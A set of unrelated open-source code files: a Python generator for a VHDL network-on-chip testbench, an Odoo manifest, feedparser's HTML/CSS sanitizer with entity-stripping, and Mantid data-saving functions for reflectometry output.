noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(3 downto 0);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "address_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 2);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "data_write_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 0);\n")
string_to_print = ""
for i in range(0, network_dime*network_dime):
string_to_print += "data_read_"+str(i)+ ", "
noc_file.write("\tsignal "+string_to_print[:-2]+": std_logic_vector(31 downto 0);\n")
noc_file.write("\t--------------\n")
if not add_SHMU:
noc_file.write("\tsignal Rxy_reconf: std_logic_vector (7 downto 0) := \"01111101\";\n")
noc_file.write("\tsignal Reconfig: std_logic := '0';\n")
noc_file.write("\t--------------\n")
noc_file.write("\tconstant clk_period : time := 10 ns;\n")
noc_file.write("\tsignal reset, not_reset, clk: std_logic :='0';\n")
noc_file.write("\n")
noc_file.write("begin\n\n")
noc_file.write(" clk_process :process\n")
noc_file.write(" begin\n")
noc_file.write(" clk <= '0';\n")
noc_file.write(" wait for clk_period/2; \n")
noc_file.write(" clk <= '1';\n")
noc_file.write(" wait for clk_period/2; \n")
noc_file.write(" end process;\n")
noc_file.write("\n")
noc_file.write("reset <= '1' after 1 ns;\n")
noc_file.write("-- instantiating the network\n")
if add_tracker:
noc_file.write("-- instantiating the flit trackers\n")
for i in range(0, network_dime**2):
noc_file.write("F_T_"+str(i)+"_T: flit_tracker generic map (\n")
noc_file.write(" DATA_WIDTH => "+str(data_width)+", \n")
noc_file.write(" tracker_file =>\"traces/track"+str(i)+"_T.txt\"\n")
noc_file.write(" )\n")
noc_file.write(" port map (\n")
noc_file.write(" clk => clk, RX => TX_L_"+str(i)+", \n")
noc_file.write(" valid_in => valid_out_L_"+str(i)+"\n")
noc_file.write(" );\n")
string_to_print = ""
string_to_print += "NoC: network_"+str(network_dime)+"x"+str(network_dime)+" generic map (DATA_WIDTH => "+str(data_width)+", DATA_WIDTH_LV => 11)\n"
if not add_SHMU:
string_to_print += "port map (reset, clk, Rxy_reconf, Reconfig, \n"
else:
string_to_print += "port map (reset, clk, \n"
for i in range(network_dime**2):
string_to_print += "\tRX_L_"+str(i)+", credit_out_L_"+str(i)+", valid_out_L_"+str(i)+", credit_in_L_"+str(i)+", valid_in_L_"+str(i)+", TX_L_"+str(i)+", \n"
if add_SHMU:
string_to_print += "\t-- should be connected to NI\n"
for i in range(0, network_dime**2):
string_to_print += "\tlink_faults_"+str(i)+", turn_faults_"+str(i)+","
string_to_print += "\tRxy_reconf_PE_"+str(i)+", Cx_reconf_PE_"+str(i)+", Reconfig_command_"+str(i)+", \n"
noc_file.write(string_to_print[:len(string_to_print)-3])
noc_file.write("\n ); \n")
noc_file.write("not_reset <= not reset; \n")
if add_node and not add_SHMU and not add_NI_Test:
noc_file.write("\n")
noc_file.write("-- connecting the PEs\n")
for node_number in range(0, network_dime*network_dime):
noc_file.write("PE_" + str(node_number) + ": NoC_Node \n")
noc_file.write("generic map( current_address => " + str(node_number) + ",\n")
noc_file.write("\tstim_file => \"code_" + str(node_number).zfill(3) + ".txt\",\n")
noc_file.write("\tlog_file => \"output_" + str(node_number).zfill(3) + ".txt\")\n\n")
noc_file.write("port map( not_reset, clk, \n")
noc_file.write("\n")
noc_file.write(" credit_in => credit_out_L_" + str(node_number) + ", \n")
noc_file.write(" valid_out => valid_in_L_" + str(node_number) + ",\n")
noc_file.write(" TX => RX_L_" + str(node_number) + ", \n")
noc_file.write("\n")
noc_file.write(" credit_out => credit_in_L_" + str(node_number) + ", \n")
noc_file.write(" valid_in => valid_out_L_" + str(node_number) + ",\n")
noc_file.write(" RX => TX_L_" + str(node_number) + "\n")
noc_file.write(" );\n")
if add_SHMU and not add_NI_Test:
noc_file.write("\n")
noc_file.write("-- connecting the PEs\n")
for node_number in range(0, network_dime*network_dime):
noc_file.write("PE_" + str(node_number) + ": NoC_Node \n")
noc_file.write("generic map( current_address => " + str(node_number) + ",\n")
noc_file.write("\tstim_file => \"code_" + str(node_number) + ".txt\",\n")
noc_file.write("\tlog_file => \"output_" + str(node_number) + ".txt\")\n\n")
noc_file.write("port map( not_reset, clk, \n")
noc_file.write("\n")
noc_file.write(" credit_in => credit_out_L_" + str(node_number) + ", \n")
noc_file.write(" valid_out => valid_in_L_" + str(node_number) + ",\n")
noc_file.write(" TX => RX_L_" + str(node_number) + ", \n")
noc_file.write("\n")
noc_file.write(" credit_out => credit_in_L_" + str(node_number) + ", \n")
noc_file.write(" valid_in => valid_out_L_" + str(node_number) + ",\n")
noc_file.write(" RX => TX_L_" + str(node_number) + ",\n")
noc_file.write(" link_faults => link_faults_"+str(node_number)+",\n")
noc_file.write(" turn_faults => turn_faults_"+str(node_number)+",\n")
noc_file.write(" Rxy_reconf_PE => Rxy_reconf_PE_"+str(node_number)+", \n")
noc_file.write(" Cx_reconf_PE => Cx_reconf_PE_"+str(node_number)+",\n")
noc_file.write(" Reconfig_command => Reconfig_command_"+str(node_number)+"\n")
noc_file.write(" );\n")
elif add_NI_Test and add_SHMU:
noc_file.write("\n")
noc_file.write("-- connecting the NIs\n")
for node_number in range(0, network_dime*network_dime):
noc_file.write("NI_" + str(node_number) + ": NI \n")
noc_file.write(" generic map(current_address => " + str(node_number) + "\n")
noc_file.write(" ) \n")
noc_file.write(" port map(clk => clk , reset => not_reset , enable => enable_" + str(node_number) + ", \n")
noc_file.write(" write_byte_enable => write_byte_enable_" + str(node_number) + ", \n")
noc_file.write(" address => address_" + str(node_number) + ", \n")
noc_file.write(" data_write => data_write_" + str(node_number) + ", \n")
noc_file.write(" data_read => data_read_" + str(node_number) + ", \n")
noc_file.write(" -- interrupt signal: generated evertime a packet is recieved!\n")
noc_file.write(" irq_out => irq_out_" + str(node_number) + ", \n")
noc_file.write(" -- signals for sending packets to network\n")
noc_file.write(" credit_in => credit_out_L_" + str(node_number) + ", \n")
noc_file.write(" valid_out => valid_in_L_" + str(node_number) + ",\n")
noc_file.write(" TX => RX_L_" + str(node_number) + ", -- data sent to the NoC\n")
noc_file.write(" -- signals for reciving packets from the network\n")
noc_file.write(" credit_out => credit_in_L_" + str(node_number) + ", \n")
noc_file.write(" valid_in => valid_out_L_" + str(node_number) + ",\n")
noc_file.write(" RX => TX_L_" + str(node_number) + ",\n")
noc_file.write(" -- fault information signals from the router\n")
noc_file.write(" link_faults => link_faults_" + str(node_number) + ", \n")
noc_file.write(" turn_faults => turn_faults_" + str(node_number) + ",\n")
noc_file.write("\n")
noc_file.write(" Rxy_reconf_PE => Rxy_reconf_PE_" + str(node_number) + ", \n")
noc_file.write(" Cx_reconf_PE => Cx_reconf_PE_" + str(node_number) + ",\n")
noc_file.write(" Reconfig_command => Reconfig_command_" + str(node_number) + "\n")
noc_file.write(" );\n")
noc_file.write("\n\n")
noc_file.write("-- connecting the packet generators\n")
for node_number in range(0, network_dime*network_dime):
random_start = random.randint(3, 50)
if got_finish_time:
random_end = sim_finish_time
else:
random_end = random.randint(random_start, 200)
noc_file.write("NI_control("+str(network_dime)+", "+str(frame_size)+", "+str(node_number)+", "+str(random_start)+", " +str(packet_size_min)+", " +str(packet_size_max)+", "+str(random_end)+" ns, clk,\n")
noc_file.write(" -- NI configuration\n")
noc_file.write(" reserved_address, flag_address, counter_address, reconfiguration_address, self_diagnosis_address,\n")
noc_file.write(" -- NI signals\n")
noc_file.write(" enable_" + str(node_number) + ", write_byte_enable_" + str(node_number) + ", address_" + str(node_number) + ", data_write_" + str(node_number) + ", data_read_" + str(node_number) + ", test_"+str(node_number)+"); \n")
noc_file.write("\n")
else:
noc_file.write("\n")
noc_file.write("-- connecting the packet generators\n")
if random_dest or bit_reversal:
for i in range(0, network_dime*network_dime):
random_start = random.randint(3, 50)
if got_finish_time:
random_end = sim_finish_time
else:
random_end = random.randint(random_start, 200)
noc_file.write("credit_counter_control(clk, credit_out_L_"+str(i)+", valid_in_L_"+str(i)+", credit_counter_out_"+str(i)+");\n")
if random_dest:
noc_file.write("gen_random_packet("+str(network_dime)+", "+str(frame_size)+", "+str(i)+", "+str(random_start)+", " +str(packet_size_min)+", " +str(packet_size_max)+", " +
str(random_end)+" ns, clk, credit_counter_out_"+str(i)+", valid_in_L_"+str(i)+", RX_L_"+str(i)+");\n")
elif bit_reversal:
noc_file.write("gen_bit_reversed_packet("+str(network_dime)+", "+str(frame_size)+", "+str(i)+", "+str(random_start)+", " +str(packet_size_min)+", " +str(packet_size_max)+", " +
str(random_end)+" ns, clk, credit_counter_out_"+str(i)+", valid_in_L_"+str(i)+", RX_L_"+str(i)+");\n")
noc_file.write("\n")
if not add_node and not add_NI_Test:
noc_file.write("\n")
noc_file.write("-- connecting the packet receivers\n")
for i in range(0, network_dime*network_dime):
noc_file.write("get_packet("+str(data_width)+", 5, "+str(i)+", clk, credit_in_L_"+str(i)+", valid_out_L_"+str(i)+", TX_L_"+str(i)+");\n")
noc_file.write("\n\n")
noc_file.write("end;\n")
|
siavooshpayandehazad/NoC_Router
|
Scripts/credit_based/network_tb_gen_parameterized_credit_based.py
|
Python
|
gpl-3.0
| 26,573
|
# -*- encoding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Timesheet on Issues',
'version': '1.0',
'category': 'Project Management',
'description': """
This module adds the Timesheet support for the Issues/Bugs Management in Project.
=================================================================================
Worklogs can be maintained to signify number of hours spent by users to handle an issue.
""",
'website': 'https://www.odoo.com/page/project-management',
'depends': [
'project_issue',
'hr_timesheet_sheet',
],
'data': [
'project_issue_sheet_view.xml',
'security/ir.model.access.csv',
'security/portal_security.xml',
],
'demo': [],
'installable': True,
'auto_install': False,
}
|
akhmadMizkat/odoo
|
addons/project_issue_sheet/__openerp__.py
|
Python
|
gpl-3.0
| 850
|
# Copyright 2010-2020 Kurt McKee <contactme@kurtmckee.org>
# Copyright 2002-2008 Mark Pilgrim
# All rights reserved.
#
# This file is a part of feedparser.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import unicode_literals
import re
from .html import _BaseHTMLProcessor
from .sgml import _SGML_AVAILABLE
from .urls import make_safe_absolute_uri
class _HTMLSanitizer(_BaseHTMLProcessor):
acceptable_elements = {
'a',
'abbr',
'acronym',
'address',
'area',
'article',
'aside',
'audio',
'b',
'big',
'blockquote',
'br',
'button',
'canvas',
'caption',
'center',
'cite',
'code',
'col',
'colgroup',
'command',
'datagrid',
'datalist',
'dd',
'del',
'details',
'dfn',
'dialog',
'dir',
'div',
'dl',
'dt',
'em',
'event-source',
'fieldset',
'figcaption',
'figure',
'font',
'footer',
'form',
'h1',
'h2',
'h3',
'h4',
'h5',
'h6',
'header',
'hr',
'i',
'img',
'input',
'ins',
'kbd',
'keygen',
'label',
'legend',
'li',
'm',
'map',
'menu',
'meter',
'multicol',
'nav',
'nextid',
'noscript',
'ol',
'optgroup',
'option',
'output',
'p',
'pre',
'progress',
'q',
's',
'samp',
'section',
'select',
'small',
'sound',
'source',
'spacer',
'span',
'strike',
'strong',
'sub',
'sup',
'table',
'tbody',
'td',
'textarea',
'tfoot',
'th',
'thead',
'time',
'tr',
'tt',
'u',
'ul',
'var',
'video',
}
acceptable_attributes = {
'abbr',
'accept',
'accept-charset',
'accesskey',
'action',
'align',
'alt',
'autocomplete',
'autofocus',
'axis',
'background',
'balance',
'bgcolor',
'bgproperties',
'border',
'bordercolor',
'bordercolordark',
'bordercolorlight',
'bottompadding',
'cellpadding',
'cellspacing',
'ch',
'challenge',
'char',
'charoff',
'charset',
'checked',
'choff',
'cite',
'class',
'clear',
'color',
'cols',
'colspan',
'compact',
'contenteditable',
'controls',
'coords',
'data',
'datafld',
'datapagesize',
'datasrc',
'datetime',
'default',
'delay',
'dir',
'disabled',
'draggable',
'dynsrc',
'enctype',
'end',
'face',
'for',
'form',
'frame',
'galleryimg',
'gutter',
'headers',
'height',
'hidden',
'hidefocus',
'high',
'href',
'hreflang',
'hspace',
'icon',
'id',
'inputmode',
'ismap',
'keytype',
'label',
'lang',
'leftspacing',
'list',
'longdesc',
'loop',
'loopcount',
'loopend',
'loopstart',
'low',
'lowsrc',
'max',
'maxlength',
'media',
'method',
'min',
'multiple',
'name',
'nohref',
'noshade',
'nowrap',
'open',
'optimum',
'pattern',
'ping',
'point-size',
'poster',
'pqg',
'preload',
'prompt',
'radiogroup',
'readonly',
'rel',
'repeat-max',
'repeat-min',
'replace',
'required',
'rev',
'rightspacing',
'rows',
'rowspan',
'rules',
'scope',
'selected',
'shape',
'size',
'span',
'src',
'start',
'step',
'style',
'summary',
'suppress',
'tabindex',
'target',
'template',
'title',
'toppadding',
'type',
'unselectable',
'urn',
'usemap',
'valign',
'value',
'variable',
'volume',
'vrml',
'vspace',
'width',
'wrap',
'xml:lang',
}
unacceptable_elements_with_end_tag = {
'applet',
'script',
'style',
}
acceptable_css_properties = {
'azimuth',
'background-color',
'border-bottom-color',
'border-collapse',
'border-color',
'border-left-color',
'border-right-color',
'border-top-color',
'clear',
'color',
'cursor',
'direction',
'display',
'elevation',
'float',
'font',
'font-family',
'font-size',
'font-style',
'font-variant',
'font-weight',
'height',
'letter-spacing',
'line-height',
'overflow',
'pause',
'pause-after',
'pause-before',
'pitch',
'pitch-range',
'richness',
'speak',
'speak-header',
'speak-numeral',
'speak-punctuation',
'speech-rate',
'stress',
'text-align',
'text-decoration',
'text-indent',
'unicode-bidi',
'vertical-align',
'voice-family',
'volume',
'white-space',
'width',
}
# survey of common keywords found in feeds
acceptable_css_keywords = {
'!important',
'aqua',
'auto',
'black',
'block',
'blue',
'bold',
'both',
'bottom',
'brown',
'center',
'collapse',
'dashed',
'dotted',
'fuchsia',
'gray',
'green',
'italic',
'left',
'lime',
'maroon',
'medium',
'navy',
'none',
'normal',
'nowrap',
'olive',
'pointer',
'purple',
'red',
'right',
'silver',
'solid',
'teal',
'top',
'transparent',
'underline',
'white',
'yellow',
}
valid_css_values = re.compile(
r'^('
r'#[0-9a-f]+' # Hex values
r'|rgb\(\d+%?,\d*%?,?\d*%?\)?' # RGB values
r'|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?' # Sizes/widths
r')$'
)
mathml_elements = {
'annotation',
'annotation-xml',
'maction',
'maligngroup',
'malignmark',
'math',
'menclose',
'merror',
'mfenced',
'mfrac',
'mglyph',
'mi',
'mlabeledtr',
'mlongdiv',
'mmultiscripts',
'mn',
'mo',
'mover',
'mpadded',
'mphantom',
'mprescripts',
'mroot',
'mrow',
'ms',
'mscarries',
'mscarry',
'msgroup',
'msline',
'mspace',
'msqrt',
'msrow',
'mstack',
'mstyle',
'msub',
'msubsup',
'msup',
'mtable',
'mtd',
'mtext',
'mtr',
'munder',
'munderover',
'none',
'semantics',
}
mathml_attributes = {
'accent',
'accentunder',
'actiontype',
'align',
'alignmentscope',
'altimg',
'altimg-height',
'altimg-valign',
'altimg-width',
'alttext',
'bevelled',
'charalign',
'close',
'columnalign',
'columnlines',
'columnspacing',
'columnspan',
'columnwidth',
'crossout',
'decimalpoint',
'denomalign',
'depth',
'dir',
'display',
'displaystyle',
'edge',
'encoding',
'equalcolumns',
'equalrows',
'fence',
'fontstyle',
'fontweight',
'form',
'frame',
'framespacing',
'groupalign',
'height',
'href',
'id',
'indentalign',
'indentalignfirst',
'indentalignlast',
'indentshift',
'indentshiftfirst',
'indentshiftlast',
'indenttarget',
'infixlinebreakstyle',
'largeop',
'length',
'linebreak',
'linebreakmultchar',
'linebreakstyle',
'lineleading',
'linethickness',
'location',
'longdivstyle',
'lquote',
'lspace',
'mathbackground',
'mathcolor',
'mathsize',
'mathvariant',
'maxsize',
'minlabelspacing',
'minsize',
'movablelimits',
'notation',
'numalign',
'open',
'other',
'overflow',
'position',
'rowalign',
'rowlines',
'rowspacing',
'rowspan',
'rquote',
'rspace',
'scriptlevel',
'scriptminsize',
'scriptsizemultiplier',
'selection',
'separator',
'separators',
'shift',
'side',
'src',
'stackalign',
'stretchy',
'subscriptshift',
'superscriptshift',
'symmetric',
'voffset',
'width',
'xlink:href',
'xlink:show',
'xlink:type',
'xmlns',
'xmlns:xlink',
}
# svgtiny - foreignObject + linearGradient + radialGradient + stop
svg_elements = {
'a',
'animate',
'animateColor',
'animateMotion',
'animateTransform',
'circle',
'defs',
'desc',
'ellipse',
'font-face',
'font-face-name',
'font-face-src',
'foreignObject',
'g',
'glyph',
'hkern',
'line',
'linearGradient',
'marker',
'metadata',
'missing-glyph',
'mpath',
'path',
'polygon',
'polyline',
'radialGradient',
'rect',
'set',
'stop',
'svg',
'switch',
'text',
'title',
'tspan',
'use',
}
# svgtiny + class + opacity + offset + xmlns + xmlns:xlink
svg_attributes = {
'accent-height',
'accumulate',
'additive',
'alphabetic',
'arabic-form',
'ascent',
'attributeName',
'attributeType',
'baseProfile',
'bbox',
'begin',
'by',
'calcMode',
'cap-height',
'class',
'color',
'color-rendering',
'content',
'cx',
'cy',
'd',
'descent',
'display',
'dur',
'dx',
'dy',
'end',
'fill',
'fill-opacity',
'fill-rule',
'font-family',
'font-size',
'font-stretch',
'font-style',
'font-variant',
'font-weight',
'from',
'fx',
'fy',
'g1',
'g2',
'glyph-name',
'gradientUnits',
'hanging',
'height',
'horiz-adv-x',
'horiz-origin-x',
'id',
'ideographic',
'k',
'keyPoints',
'keySplines',
'keyTimes',
'lang',
'marker-end',
'marker-mid',
'marker-start',
'markerHeight',
'markerUnits',
'markerWidth',
'mathematical',
'max',
'min',
'name',
'offset',
'opacity',
'orient',
'origin',
'overline-position',
'overline-thickness',
'panose-1',
'path',
'pathLength',
'points',
'preserveAspectRatio',
'r',
'refX',
'refY',
'repeatCount',
'repeatDur',
'requiredExtensions',
'requiredFeatures',
'restart',
'rotate',
'rx',
'ry',
'slope',
'stemh',
'stemv',
'stop-color',
'stop-opacity',
'strikethrough-position',
'strikethrough-thickness',
'stroke',
'stroke-dasharray',
'stroke-dashoffset',
'stroke-linecap',
'stroke-linejoin',
'stroke-miterlimit',
'stroke-opacity',
'stroke-width',
'systemLanguage',
'target',
'text-anchor',
'to',
'transform',
'type',
'u1',
'u2',
'underline-position',
'underline-thickness',
'unicode',
'unicode-range',
'units-per-em',
'values',
'version',
'viewBox',
'visibility',
'width',
'widths',
'x',
'x-height',
'x1',
'x2',
'xlink:actuate',
'xlink:arcrole',
'xlink:href',
'xlink:role',
'xlink:show',
'xlink:title',
'xlink:type',
'xml:base',
'xml:lang',
'xml:space',
'xmlns',
'xmlns:xlink',
'y',
'y1',
'y2',
'zoomAndPan',
}
svg_attr_map = None
svg_elem_map = None
acceptable_svg_properties = {
'fill',
'fill-opacity',
'fill-rule',
'stroke',
'stroke-linecap',
'stroke-linejoin',
'stroke-opacity',
'stroke-width',
}
def __init__(self, encoding=None, _type='application/xhtml+xml'):
super(_HTMLSanitizer, self).__init__(encoding, _type)
self.unacceptablestack = 0
self.mathmlOK = 0
self.svgOK = 0
def reset(self):
super(_HTMLSanitizer, self).reset()
self.unacceptablestack = 0
self.mathmlOK = 0
self.svgOK = 0
def unknown_starttag(self, tag, attrs):
acceptable_attributes = self.acceptable_attributes
keymap = {}
if tag not in self.acceptable_elements or self.svgOK:
if tag in self.unacceptable_elements_with_end_tag:
self.unacceptablestack += 1
# add implicit namespaces to html5 inline svg/mathml
if self._type.endswith('html'):
if not dict(attrs).get('xmlns'):
if tag == 'svg':
attrs.append(('xmlns', 'http://www.w3.org/2000/svg'))
if tag == 'math':
attrs.append(('xmlns', 'http://www.w3.org/1998/Math/MathML'))
# not otherwise acceptable, perhaps it is MathML or SVG?
if tag == 'math' and ('xmlns', 'http://www.w3.org/1998/Math/MathML') in attrs:
self.mathmlOK += 1
if tag == 'svg' and ('xmlns', 'http://www.w3.org/2000/svg') in attrs:
self.svgOK += 1
# chose acceptable attributes based on tag class, else bail
if self.mathmlOK and tag in self.mathml_elements:
acceptable_attributes = self.mathml_attributes
elif self.svgOK and tag in self.svg_elements:
# For most vocabularies, lowercasing is a good idea. Many
# svg elements, however, are camel case.
if not self.svg_attr_map:
lower = [attr.lower() for attr in self.svg_attributes]
mix = [a for a in self.svg_attributes if a not in lower]
self.svg_attributes = lower
self.svg_attr_map = {a.lower(): a for a in mix}
lower = [attr.lower() for attr in self.svg_elements]
mix = [a for a in self.svg_elements if a not in lower]
self.svg_elements = lower
self.svg_elem_map = {a.lower(): a for a in mix}
acceptable_attributes = self.svg_attributes
tag = self.svg_elem_map.get(tag, tag)
keymap = self.svg_attr_map
elif tag not in self.acceptable_elements:
return
# declare xlink namespace, if needed
if self.mathmlOK or self.svgOK:
if any((a for a in attrs if a[0].startswith('xlink:'))):
if not ('xmlns:xlink', 'http://www.w3.org/1999/xlink') in attrs:
attrs.append(('xmlns:xlink', 'http://www.w3.org/1999/xlink'))
clean_attrs = []
for key, value in self.normalize_attrs(attrs):
if key == 'style' and 'style' in acceptable_attributes:
clean_value = self.sanitize_style(value)
if clean_value:
clean_attrs.append((key, clean_value))
elif key in acceptable_attributes:
key = keymap.get(key, key)
# make sure the uri uses an acceptable uri scheme
if key == 'href':
value = make_safe_absolute_uri(value)
clean_attrs.append((key, value))
super(_HTMLSanitizer, self).unknown_starttag(tag, clean_attrs)
def unknown_endtag(self, tag):
if tag not in self.acceptable_elements:
if tag in self.unacceptable_elements_with_end_tag:
self.unacceptablestack -= 1
if self.mathmlOK and tag in self.mathml_elements:
if tag == 'math' and self.mathmlOK:
self.mathmlOK -= 1
elif self.svgOK and tag in self.svg_elements:
tag = self.svg_elem_map.get(tag, tag)
if tag == 'svg' and self.svgOK:
self.svgOK -= 1
else:
return
super(_HTMLSanitizer, self).unknown_endtag(tag)
def handle_pi(self, text):
pass
def handle_decl(self, text):
pass
def handle_data(self, text):
if not self.unacceptablestack:
super(_HTMLSanitizer, self).handle_data(text)
def sanitize_style(self, style):
# disallow urls
style = re.compile(r'url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ', style)
# gauntlet
if not re.match(r"""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style):
return ''
# This replaced a regexp that used re.match and was prone to
# pathological back-tracking.
if re.sub(r"\s*[-\w]+\s*:\s*[^:;]*;?", '', style).strip():
return ''
clean = []
for prop, value in re.findall(r"([-\w]+)\s*:\s*([^:;]*)", style):
if not value:
continue
if prop.lower() in self.acceptable_css_properties:
clean.append(prop + ': ' + value + ';')
elif prop.split('-')[0].lower() in ['background', 'border', 'margin', 'padding']:
for keyword in value.split():
if (
keyword not in self.acceptable_css_keywords
and not self.valid_css_values.match(keyword)
):
break
else:
clean.append(prop + ': ' + value + ';')
elif self.svgOK and prop.lower() in self.acceptable_svg_properties:
clean.append(prop + ': ' + value + ';')
return ' '.join(clean)
def parse_comment(self, i, report=1):
ret = super(_HTMLSanitizer, self).parse_comment(i, report)
if ret >= 0:
return ret
# if ret == -1, this may be a malicious attempt to circumvent
# sanitization, or a page-destroying unclosed comment
match = re.compile(r'--[^>]*>').search(self.rawdata, i+4)
if match:
return match.end()
# unclosed comment; deliberately fail to handle_data()
return len(self.rawdata)
def _sanitize_html(html_source, encoding, _type):
if not _SGML_AVAILABLE:
return html_source
p = _HTMLSanitizer(encoding, _type)
html_source = html_source.replace('<![CDATA[', '<![CDATA[')
p.feed(html_source)
data = p.output()
data = data.strip().replace('\r\n', '\n')
return data
# Match XML entity declarations.
# Example: <!ENTITY copyright "(C)">
RE_ENTITY_PATTERN = re.compile(br'^\s*<!ENTITY([^>]*?)>', re.MULTILINE)
# Match XML DOCTYPE declarations.
# Example: <!DOCTYPE feed [ ]>
RE_DOCTYPE_PATTERN = re.compile(br'^\s*<!DOCTYPE([^>]*?)>', re.MULTILINE)
# Match safe entity declarations.
# This will allow hexadecimal character references through,
# as well as text, but not arbitrary nested entities.
# Example: cubed "³"
# Example: copyright "(C)"
# Forbidden: explode1 "&explode2;&explode2;"
RE_SAFE_ENTITY_PATTERN = re.compile(br'\s+(\w+)\s+"(&#\w+;|[^&"]*)"')
def replace_doctype(data):
"""Strips and replaces the DOCTYPE, returns (rss_version, stripped_data)
rss_version may be 'rss091n' or None
stripped_data is the same XML document with a replaced DOCTYPE
"""
# Divide the document into two groups by finding the location
# of the first element that doesn't begin with '<?' or '<!'.
start = re.search(br'<\w', data)
start = start and start.start() or -1
head, data = data[:start+1], data[start+1:]
# Save and then remove all of the ENTITY declarations.
entity_results = RE_ENTITY_PATTERN.findall(head)
head = RE_ENTITY_PATTERN.sub(b'', head)
# Find the DOCTYPE declaration and check the feed type.
doctype_results = RE_DOCTYPE_PATTERN.findall(head)
doctype = doctype_results and doctype_results[0] or b''
if b'netscape' in doctype.lower():
version = 'rss091n'
else:
version = None
# Re-insert the safe ENTITY declarations if a DOCTYPE was found.
replacement = b''
if len(doctype_results) == 1 and entity_results:
safe_entities = [
e
for e in entity_results
if RE_SAFE_ENTITY_PATTERN.match(e)
]
if safe_entities:
replacement = b'<!DOCTYPE feed [\n<!ENTITY' \
+ b'>\n<!ENTITY '.join(safe_entities) \
+ b'>\n]>'
data = RE_DOCTYPE_PATTERN.sub(replacement, head) + data
# Precompute the safe entities for the loose parser.
safe_entities = {
k.decode('utf-8'): v.decode('utf-8')
for k, v in RE_SAFE_ENTITY_PATTERN.findall(replacement)
}
return version, data, safe_entities
|
Vagab0nd/SiCKRAGE
|
lib3/feedparser/sanitizer.py
|
Python
|
gpl-3.0
| 24,025
|
#pylint: disable=invalid-name
from __future__ import (absolute_import, division, print_function)
from PyQt4 import QtCore
from mantid.simpleapi import *
import numpy as n
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
def saveCustom(idx,fname,sep = ' ',logs = [],title = False,error = False):
fname+='.dat'
print("FILENAME: ", fname)
a1=mtd[str(idx.text())]
titl='#'+a1.getTitle()+'\n'
x1=a1.readX(0)
X1=n.zeros((len(x1)-1))
for i in range(0,len(x1)-1):
X1[i]=(x1[i]+x1[i+1])/2.0
y1=a1.readY(0)
e1=a1.readE(0)
f=open(fname,'w')
if title:
f.write(titl)
samp = a1.getRun()
for log in logs:
prop = samp.getLogData(str(log.text()))
headerLine='#'+log.text() + ': ' + str(prop.value) + '\n'
print(headerLine)
f.write(headerLine)
qres=(X1[1]-X1[0])/X1[1]
print("Constant dq/q from file: ",qres)
for i in range(len(X1)):
if error:
dq=X1[i]*qres
s="%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i] + sep + "%e" % dq +"\n"
else:
s="%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i]+ "\n"
f.write(s)
f.close()
def saveANSTO(idx,fname):
fname+='.txt'
print("FILENAME: ", fname)
a1=mtd[str(idx.text())]
x1=a1.readX(0)
X1=n.zeros((len(x1)-1))
for i in range(0,len(x1)-1):
X1[i]=(x1[i]+x1[i+1])/2.0
y1=a1.readY(0)
e1=a1.readE(0)
sep='\t'
f=open(fname,'w')
qres=(X1[1]-X1[0])/X1[1]
print("Constant dq/q from file: ",qres)
for i in range(len(X1)):
dq=X1[i]*qres
s="%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i] + sep + "%e" % dq +"\n"
f.write(s)
f.close()
def saveMFT(idx,fname,logs):
fname+='.mft'
print("FILENAME: ", fname)
a1=mtd[str(idx.text())]
x1=a1.readX(0)
X1=n.zeros((len(x1)-1))
for i in range(0,len(x1)-1):
X1[i]=(x1[i]+x1[i+1])/2.0
y1=a1.readY(0)
e1=a1.readE(0)
sep='\t'
f=open(fname,'w')
f.write('MFT\n')
f.write('Instrument: '+a1.getInstrument().getName()+'\n')
f.write('User-local contact: \n')
f.write('Title: \n')
samp = a1.getRun()
s = 'Subtitle: '+samp.getLogData('run_title').value+'\n'
f.write(s)
s = 'Start date + time: '+samp.getLogData('run_start').value+'\n'
f.write(s)
s = 'End date + time: '+samp.getLogData('run_end').value+'\n'
f.write(s)
for log in logs:
prop = samp.getLogData(str(log.text()))
headerLine=log.text() + ': ' + str(prop.value) + '\n'
print(headerLine)
f.write(headerLine)
f.write('Number of file format: 2\n')
s = 'Number of data points:\t' + str(len(X1))+'\n'
f.write(s)
f.write('\n')
f.write('\tq\trefl\trefl_err\tq_res\n')
